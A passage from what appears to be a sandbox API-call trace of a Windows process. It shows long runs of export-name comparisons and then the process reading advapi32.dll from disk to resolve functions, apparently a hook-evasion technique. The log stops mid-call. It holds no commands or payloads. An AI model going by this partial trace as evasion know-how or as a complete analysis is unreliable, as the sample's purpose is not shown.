(lpString1="AppCacheDeleteGroup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0123.559] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheDeleteGroup") returned 0 [0123.559] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCheckManifest") returned 1 [0123.559] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCloseHandle") returned 1 [0123.559] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0123.559] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheDeleteGroup") returned 1 [0123.559] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheDeleteIEGroup") returned 0 [0123.559] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCheckManifest") returned 1 [0123.559] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCloseHandle") returned 1 [0123.559] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCreateAndCommitFile") returned 1 [0123.559] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDeleteGroup") returned 1 [0123.559] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDeleteIEGroup") returned 1 [0123.559] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDuplicateHandle") returned 0 [0123.560] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCheckManifest") returned 1 [0123.560] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCloseHandle") returned 1 [0123.560] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCreateAndCommitFile") returned 1 [0123.560] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDeleteGroup") returned 1 [0123.560] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDeleteIEGroup") returned 1 [0123.560] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDuplicateHandle") returned 1 [0123.560] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheFinalize") returned 0 [0123.560] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCheckManifest") returned 1 [0123.560] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCloseHandle") returned 1 [0123.560] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0123.560] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDeleteGroup") returned 1 [0123.560] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDeleteIEGroup") returned 1 [0123.560] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDuplicateHandle") returned 1 [0123.560] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheFinalize") returned 1 [0123.560] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheFreeDownloadList") returned 0 [0123.560] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCheckManifest") returned 1 [0123.560] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCloseHandle") returned 1 [0123.560] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0123.560] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0123.561] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0123.561] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0123.561] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFinalize") returned 1 [0123.561] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0123.561] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFreeGroupList") returned 0 [0123.561] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCheckManifest") returned 1 [0123.561] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCloseHandle") returned 1 [0123.561] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCreateAndCommitFile") returned 1 [0123.561] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDeleteGroup") returned 1 [0123.561] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDeleteIEGroup") returned 1 [0123.561] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDuplicateHandle") returned 1 [0123.561] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFinalize") returned 1 [0123.561] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeDownloadList") returned 1 [0123.561] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeGroupList") returned 1 [0123.561] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeIESpace") returned 0 [0123.562] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCheckManifest") returned 1 [0123.562] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCloseHandle") returned 1 [0123.562] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCreateAndCommitFile") returned 1 [0123.562] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDeleteGroup") returned 1 [0123.562] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDeleteIEGroup") returned 1 [0123.562] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDuplicateHandle") returned 1 [0123.562] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFinalize") returned 1 [0123.562] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeDownloadList") returned 1 [0123.562] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeGroupList") returned 1 [0123.562] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeIESpace") returned 1 [0123.562] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeSpace") returned 0 [0123.562] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCheckManifest") returned 1 [0123.562] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCloseHandle") returned 1 [0123.562] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0123.562] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDeleteGroup") returned 1 [0123.562] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDeleteIEGroup") returned 1 [0123.562] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDuplicateHandle") returned 1 [0123.562] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFinalize") returned 1 [0123.562] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeDownloadList") returned 1 [0123.562] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeGroupList") returned 1 [0123.562] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeIESpace") returned 1 [0123.562] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeSpace") returned 1 [0123.562] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheGetDownloadList") returned 0 [0123.562] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCheckManifest") returned 1 [0123.563] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCloseHandle") returned 1 [0123.563] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCreateAndCommitFile") returned 1 [0123.563] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDeleteGroup") returned 1 [0123.563] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDeleteIEGroup") returned 1 [0123.563] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDuplicateHandle") returned 1 [0123.563] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFinalize") returned 1 [0123.563] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeDownloadList") returned 1 [0123.563] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeGroupList") returned 1 [0123.563] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeIESpace") returned 1 [0123.563] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeSpace") returned 1 [0123.563] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheGetDownloadList") returned 1 [0123.563] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheGetFallbackUrl") returned 0 [0123.563] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCheckManifest") returned 1 [0123.563] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCloseHandle") returned 1 [0123.563] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0123.563] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0123.563] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0123.563] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0123.563] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFinalize") returned 1 [0123.563] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0123.563] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeGroupList") returned 1 [0123.563] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeIESpace") returned 1 [0123.564] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeSpace") returned 1 [0123.564] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetDownloadList") returned 1 [0123.564] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetFallbackUrl") returned 1 [0123.564] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetGroupList") returned 0 [0123.564] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCheckManifest") returned 1 [0123.564] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCloseHandle") returned 1 [0123.564] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0123.564] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0123.564] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0123.564] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0123.564] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFinalize") returned 1 [0123.564] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0123.564] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeGroupList") returned 1 [0123.564] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeIESpace") returned 1 [0123.564] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeSpace") returned 1 [0123.564] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetDownloadList") returned 1 [0123.564] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetFallbackUrl") returned 1 [0123.564] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetGroupList") returned 1 [0123.564] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetIEGroupList") returned 0 [0123.564] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCheckManifest") returned 1 [0123.564] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCloseHandle") returned 1 [0123.564] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCreateAndCommitFile") returned 1 [0123.564] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDeleteGroup") returned 1 [0123.564] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDeleteIEGroup") returned 1 [0123.564] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDuplicateHandle") returned 1 [0123.565] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFinalize") returned 1 [0123.565] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeDownloadList") returned 1 [0123.565] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeGroupList") returned 1 [0123.565] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeIESpace") returned 1 [0123.565] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeSpace") returned 1 [0123.565] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetDownloadList") returned 1 [0123.565] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetFallbackUrl") returned 1 [0123.565] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetGroupList") returned 1 [0123.565] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetIEGroupList") returned 1 [0123.565] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetInfo") returned 0 [0123.565] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCheckManifest") returned 1 [0123.565] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCloseHandle") returned 1 [0123.565] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCreateAndCommitFile") returned 1 [0123.565] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDeleteGroup") returned 1 [0123.565] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDeleteIEGroup") returned 1 [0123.565] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDuplicateHandle") returned 1 [0123.565] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFinalize") returned 1 [0123.565] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeDownloadList") returned 1 [0123.565] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeGroupList") returned 1 [0123.565] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeIESpace") returned 1 [0123.565] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeSpace") returned 1 [0123.565] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetDownloadList") returned 1 [0123.565] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetFallbackUrl") returned 1 [0123.565] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetGroupList") returned 1 [0123.566] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetIEGroupList") returned 1 [0123.566] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetInfo") returned 1 [0123.566] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetManifestUrl") returned 0 [0123.566] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCheckManifest") returned 1 [0123.566] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCloseHandle") returned 1 [0123.566] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0123.566] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDeleteGroup") returned 1 [0123.566] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDeleteIEGroup") returned 1 [0123.566] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDuplicateHandle") returned 1 [0123.566] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFinalize") returned 1 [0123.566] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeDownloadList") returned 1 [0123.566] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeGroupList") returned 1 [0123.566] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeIESpace") returned 1 [0123.566] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeSpace") returned 1 [0123.566] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetDownloadList") returned 1 [0123.566] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetFallbackUrl") returned 1 [0123.566] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetGroupList") returned 1 [0123.566] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetIEGroupList") returned 1 [0123.566] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetInfo") returned 1 [0123.566] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetManifestUrl") returned 1 [0123.566] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheLookup") returned 0 [0123.566] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCheckManifest") returned 1 [0123.566] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCloseHandle") returned 1 [0123.566] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCreateAndCommitFile") returned 1 [0123.566] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDeleteGroup") returned 1 [0123.566] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDeleteIEGroup") returned 1 [0123.567] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDuplicateHandle") returned 1 [0123.567] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFinalize") returned 1 [0123.567] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeDownloadList") returned 1 [0123.567] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeGroupList") returned 1 [0123.567] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeIESpace") returned 1 [0123.567] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeSpace") returned 1 [0123.567] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetDownloadList") returned 1 [0123.567] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetFallbackUrl") returned 1 [0123.567] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetGroupList") returned 1 [0123.567] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetIEGroupList") returned 1 [0123.567] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetInfo") returned 1 [0123.567] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetManifestUrl") returned 1 [0123.567] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheLookup") returned 1 [0123.567] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="CommitUrlCacheEntryA") returned 0 [0123.567] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCheckManifest") returned 1 [0123.567] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCloseHandle") returned 1 [0124.045] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCreateAndCommitFile") returned 1 [0124.045] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDeleteGroup") returned 1 [0124.045] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDeleteIEGroup") returned 1 [0124.045] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDuplicateHandle") returned 1 [0124.045] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFinalize") returned 1 [0124.045] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeDownloadList") returned 1 [0124.045] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeGroupList") returned 1 [0124.045] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeIESpace") returned 1 [0124.045] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeSpace") returned 1 [0124.046] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetDownloadList") returned 1 [0124.046] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetFallbackUrl") returned 1 [0124.046] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetGroupList") returned 1 [0124.046] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetIEGroupList") returned 1 [0124.046] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetInfo") returned 1 [0124.046] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetManifestUrl") returned 1 [0124.046] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheLookup") returned 1 [0124.046] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="CommitUrlCacheEntryA") returned 1 [0124.046] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="CommitUrlCacheEntryBinaryBlob") returned 0 [0124.046] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCheckManifest") returned 1 [0124.046] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCloseHandle") returned 1 [0124.046] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCreateAndCommitFile") returned 1 [0124.046] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDeleteGroup") returned 1 [0124.046] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDeleteIEGroup") returned 1 [0124.046] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDuplicateHandle") returned 1 [0124.046] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFinalize") returned 1 [0124.046] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeDownloadList") returned 1 [0124.046] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeGroupList") returned 1 [0124.046] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeIESpace") returned 1 [0124.046] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeSpace") returned 1 [0124.046] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetDownloadList") returned 1 [0124.046] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetFallbackUrl") returned 1 [0124.046] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetGroupList") returned 1 [0124.047] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetIEGroupList") returned 1 [0124.047] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetInfo") returned 1 [0124.047] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetManifestUrl") returned 1 [0124.047] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheLookup") returned 1 [0124.047] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryA") returned 1 [0124.047] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryBinaryBlob") returned 1 [0124.047] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryW") returned 0 [0124.047] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCheckManifest") returned 1 [0124.047] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCloseHandle") returned 1 [0124.047] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCreateAndCommitFile") returned 1 [0124.047] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDeleteGroup") returned 1 [0124.047] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDeleteIEGroup") returned 1 [0124.047] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDuplicateHandle") returned 1 [0124.047] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFinalize") returned 1 [0124.047] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeDownloadList") returned 1 [0124.047] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeGroupList") returned 1 [0124.047] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeIESpace") returned 1 [0124.047] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeSpace") returned 1 [0124.047] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetDownloadList") returned 1 [0124.047] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetFallbackUrl") returned 1 [0124.047] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetGroupList") returned 1 [0124.047] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetIEGroupList") returned 1 [0124.047] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetInfo") returned 1 [0124.047] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetManifestUrl") returned 1 [0124.048] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheLookup") returned 1 [0124.064] GetProcessHeap () returned 0x530000 [0124.065] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x411f040 | out: hHeap=0x530000) returned 1 [0124.079] GetProcessHeap () returned 0x530000 [0124.079] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x10) returned 0x549360 [0124.080] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x7ffc5ec20000 [0124.080] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0124.080] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0124.080] GetModuleFileNameA (in: hModule=0x7ffc5ec20000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0124.080] CreateFileA (lpFileName="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0124.293] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0124.325] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0124.325] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=671472) returned 1 [0124.325] GetProcessHeap () returned 0x530000 [0124.325] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xa3ef0) returned 0x2d52010 [0124.328] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0124.328] ReadFile (in: hFile=0x140, lpBuffer=0x2d52010, nNumberOfBytesToRead=0xa3ef0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d52010*, lpNumberOfBytesRead=0x14f5a4*=0xa3ef0, lpOverlapped=0x0) returned 1 [0124.338] CloseHandle (hObject=0x140) returned 1 [0124.339] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAFinal") returned 1 [0124.339] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAInit") returned 1 [0124.339] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAUpdate") returned 1 [0124.339] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="AbortSystemShutdownA") returned 0 [0124.339] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAFinal") returned 1 [0124.339] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAInit") returned 1 [0124.339] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAUpdate") returned 1 [0124.339] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="AbortSystemShutdownA") returned 1 [0124.339] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="AbortSystemShutdownW") returned 0 [0124.339] lstrcmpA (lpString1="AccessCheck", 